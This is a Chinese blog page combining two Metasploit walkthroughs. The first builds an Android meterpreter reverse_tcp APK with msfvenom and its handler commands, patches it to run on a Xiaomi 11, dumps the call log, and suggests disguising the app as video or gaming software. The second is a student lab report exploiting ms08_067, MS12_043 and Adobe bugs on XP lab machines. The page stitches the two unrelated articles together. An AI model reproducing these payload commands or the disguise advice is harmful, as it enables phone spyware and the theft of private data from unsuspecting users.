msf对小米11进行安全渗透

Posted SwBack

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了msf对小米11进行安全渗透相关的知识,希望对你有一定的参考价值。

作者:SwBack
技术交流Q群:768493664

文章在饭前编写,由于着急吃饭,所以排版比较乱

环境配置

工具型号接入方式
kali2021桥接
安卓手机小米11WIFI
android KillerV1.3.1.0apktools 2.6.1

实验过程中小米11 未提示风险,(仅签名问题提示非小米应用商店app)
但是功能实际都被拦截,无法获取敏感信息,如通话记录,短信等。
当开启权限之后,信息被成功获取。如文章最下图

实战过程中可以对app进行伪装,修改图标,标题,版本,签名

如(XX直播,XX视频,刷赞,兼职,XX游戏等等)

启动kali后,先查看自己本机IP地址如下

┌──(root💀kali)-[~/桌面]
└─# ip a                                           
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:91:2d:65 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.105/24 brd 192.168.0.255 scope global dynamic noprefixroute eth0
       valid_lft 6529sec preferred_lft 6529sec
    inet6 fe80::20c:29ff:fe91:2d65/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

生成木马

然后执行如下命令生成木马文件.

这里监听了5555端口

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=5555 R >Android.apk

开启msf后,加载攻击载荷

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
#设置监听IP
set LHOST 192.168.0.105
#设置监听端口
set LPORT 5555
#进行监听
run

这里的apk还无法直接在安卓中运行。

提示如下:

修改木马

通过对apk反编译。

网上说修改AndroidManifest.xml 文件.

不过该文件需要反编译才能查看。推荐使用xml2axml.jar工具进行,该工具可以直接反编译和编译。

这里我们修改apktool.yml

minSdkVersion修改为16

targetSdkVersion修改为23

对其进行编译

攻击成功

导入手机安装运行之后kali 回显如下内容证明攻击成功。

执行下命令app_list 查看下软件列表,看下用什么app看视频

获取通话记录

meterpreter > dump_calllog
[*] Fetching 624 entries
[*] Call log saved to calllog_dump_20220824201308.txt


最后

在这里可以通过? 进行查看命令

Exp5 MSF基础应用

实验前的了解:MSF的六种模块

  • Exploit模块
    • 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
    • 形象点来说就是攻击模块
  • Payload模块
    • 是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。
  • Encoder模块
    • 针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征
    • 不改变payload作用,但能对payload进行加工
  • Aux模块
    • 能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
    • 主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。
  • Post模块
    • 支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。
    • 这里主要指的是攻击之后可能用到的模块
  • Nops模块
    • 是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90
    • 因为有些代码返回地址很难确认,所以在实际中有时候会填充一大段空指令,便于快速确定返回地址的位置

 

实践内容

1主动攻击实践,这里选择ms08_067漏洞攻击

攻击机:kali

靶机:  Windows XP Professional with Service Pack 3 (x86)简体中文版

技术分享图片

1)打开msf,并通过search命令找出相应的漏洞:

技术分享图片

 

接着加载payload,默认还是选择 generic/shell_reverse_tcp,获取靶机的shell,设置还是那些,不熟悉的话可以用show options来查看有哪些可以进行设置的的项,如图:

设置LHOST(攻击机的IP):192.168.0.12

设置RHOST(靶机的IP)   :192.168.0.4

技术分享图片

试了其他的几个payload也是GG,

技术分享图片

 检查了一下都是可以相互ping通的:

技术分享图片技术分享图片

这个中文版靶机是原先早就安好的,当时也没看其他的讲义或博客就直接用了,后来看到其他同学放入博客也是如此,于是用了重新安装了一个英文版的win xp,再执行一下上述的操作,果然是可以的。<其实之前还尝试了一下攻击我的win10物理机,网上搜集了几个漏洞试了试发现都全都GG(可能我之前打补丁打得比较勤快),没成功这里也懒得放图了>

这里是对英文版的XP进行攻击的结果,很容易就成功了:

新的系统信息,怎么感觉跟之前的那个一样呢....只是这个是英文版而已,到了中国除了汉化还另加补丁??不懂,懒得深究了:

技术分享图片

 

第一个攻击是获取shell:

技术分享图片

然后还可以玩玩截屏:

技术分享图片

之后还试了一试弹窗之类的payload--Windows/messagebox,用法大概都差不多吧,反正敲一下show options该设置的条目就一目了然了,exploit之后靶机没有出现弹窗。。只是会有相应的提示音,很迷:

技术分享图片

2利用IE漏洞攻击——以MS12_043漏洞为例

 

 

 这个漏洞也是针对IE的,跟老师举的ms11_050类似,操作及配置如下:

require下面是yes的就是我们可能需要配置的,这个看它的说明的话,好像不配置也可以,那个SRVHOST之类的是本机的IP,它生成URL的时候会自动读取本机IP,不用刻意地去给他配,SRVPORT同

技术分享图片

 

下面生成URL,并将URL发送到靶机,靶机访问之后就能控制它了,下图中的session 1就是中招的靶机:

技术分享图片

输入sessions,找出所有信息:

技术分享图片

由于我电脑有点卡,一开始点击链接没反应我就多点了几下,结果出来三个,尝试获取shell时只有第二个可以:

技术分享图片

 如图,成功。

还有一个就是利用Adobe_flash的某个漏洞做的,也是面向浏览器的一个漏洞,最后也成功攻击了。

技术分享图片

不过把这个拿到我的win10里面基本上没有用,win0还是很强

技术分享图片

3利用客户端攻击——Adobe

 一开始我用的adode X(也就是Adobe 10版本),也是利用了windows/fileformat/adobe_cooltype_sing,然后设置也是一步一步来的,如图:

技术分享图片

跟其他同学一样的做法就是不能在在Adobe X上攻击成功

技术分享图片

后来拿Adobe 9.0试了一下,就可以了,还是版本的问题:

技术分享图片

在这个过程中想在里面找几个能类似的能攻击Adobe X版本的漏洞,没找到合适的。。要么不成功,要么就是不支持....于是认怂算了,以后再说吧

4、辅助模块应用

使用指令 show auxiliary 可以查看当前版本可用的辅助功能模块:

技术分享图片

 

第一个是使用了auxiliary/scanner/ftp/ftp_version  //FTP主机扫描

技术分享图片

第二个模块:Metasploit的auxiliary/scanner/http/wordpress_ghost_scanner模块可以攻击有类似问题的wordpress网站,(前提是开启xmlrpc功能,3.5版本以上默认开启),参考链接

技术分享图片

不怎么会设置这东西...

结果就是这样:

技术分享图片

基础问题回答

1. 用自己的话解释什么是exploit,payload,encode。

exploit:攻击模块, 就是是利用某些特定的漏洞,将攻击的具体执行步骤(或者说恶意代码)传到靶机上,从而对靶机进行一系列控制操作的过程。

payload:攻击载荷,即渗透成功后帮助攻击者接下来进一步控制靶机所需要的东西。

encode:对payload进行编码,可能跟我们之前实验中提到的免杀有关。

2. 离实战还缺些什么技术或步骤?

这个问题......感觉离实战还差得很远。我的这次实验真的是体现了“柿子捡软的捏”,靶机和软件的版本稍微高级一点,我感觉就束手无策了。而且随着现在人们的安全防范意识越来越强,对那些链可疑的链接和文件是不会中招的,更何况还有各类强大的安全软件(比如360)在时刻保护着人们的电脑外加不断更新推送的补丁........要真正攻击成功不仅要熟悉各类的分析工具的用法,还要懂得如何利用有效的手段攻击,如何对自己的攻击进行巧妙的伪装等等。总之还差得远!

实验体会

这次实验做得真的累,一方面自己对这个原本就不是很懂,一路做下来磕磕碰碰很难受;另一方面这破电脑实在是不适合干这个活,老歇菜,简直了!不过做完之后还是有收获的吧,对于黑客攻击的手段、方法和途径又有了进一步的认识。通过这次实验我感觉攻击与被攻击的双方真的是在打着一场没有硝烟的战争啊,而且相当地激烈!可以用“你方唱罢我登场”来形容,所以网络安全这一块还是值得关注,毕竟这些还是跟我们的生活和工作息息相关。另外,这次实验做完是真的更加懂得及时升级和打补丁的必要性了!!

然而没有出现弹窗

以上是关于msf对小米11进行安全渗透的主要内容,如果未能解决你的问题,请参考以下文章

Vulnstack红日安全内网域渗透靶场1实战

安全攻防实战系列MSF

Exp5 MSF基础应用

20145234黄斐《网络对抗技术》实验五,MSF基础应用

Windows网络服务渗透测试实战-MSF恶意程序利用

2020-2021-4 20175229《网络对抗技术》Exp6 MSF基础应用